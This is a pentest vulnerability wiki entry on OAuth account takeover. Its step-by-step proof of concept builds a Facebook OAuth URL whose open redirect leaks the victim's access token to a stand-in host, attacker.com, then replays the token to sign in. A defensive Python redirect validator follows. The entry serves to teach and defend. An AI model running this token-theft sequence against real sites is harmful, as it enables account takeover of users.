Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

OAuth Account Takeover

POC

1.) Sign in to a Facebook-linked account.
2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?nextaction=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8
3.) You will be redirected to attacker.com and your access_token will be leaked.
4.) Now start an incognito session and visit: https://target.com/auth/facebook-login?access_token=insert_stolen_access_token_here
5.) You should now be signed in to the Facebook-linked account.
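The root cause in the PoC above is that the registered redirect URI is the target's own login page, which then forwards the browser to whatever the nextaction parameter names; browsers carry the #access_token fragment across that second redirect, so the token lands on attacker.com. The following validator is an added example, not Cobalt's or the target's code; the host target.com and the parameter name are assumptions taken from the PoC. It accepts only same-site relative paths for such a post-login redirect parameter.

```python
from urllib.parse import urlsplit, urljoin

# Assumption: the application's own host (taken from the PoC above).
SITE_HOST = "target.com"


def safe_next_path(next_value: str, default: str = "/") -> str:
    """Return a safe post-login redirect: a path on this site, or `default`.

    Rejects scheme-relative (//attacker.com), absolute (https://attacker.com),
    backslash ("/\\attacker.com", which browsers read as "//attacker.com") and
    control-character variants, and anything not starting with a single '/'.
    """
    if not next_value:
        return default
    # Drop ASCII control characters (tab, newline, DEL) that URL parsers in
    # browsers ignore, then trim surrounding whitespace.
    value = "".join(ch for ch in next_value if ord(ch) > 0x1F and ch != "\x7f").strip()
    # Browsers treat backslash like a forward slash in URLs.
    if "\\" in value:
        return default
    # Must be site-relative: exactly one leading slash, not "//host".
    if not value.startswith("/") or value.startswith("//"):
        return default
    # Defence in depth: resolve against our own origin (this also collapses
    # "/..//" dot-segment tricks) and confirm the host did not change.
    resolved = urlsplit(urljoin(f"https://{SITE_HOST}/", value))
    if resolved.scheme != "https" or resolved.netloc != SITE_HOST:
        return default
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")
```

The login handler should pass the raw nextaction value through this function and redirect only to its result, so the value from the PoC (//attacker.com) falls back to "/".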

Impact

High

Likelihood

High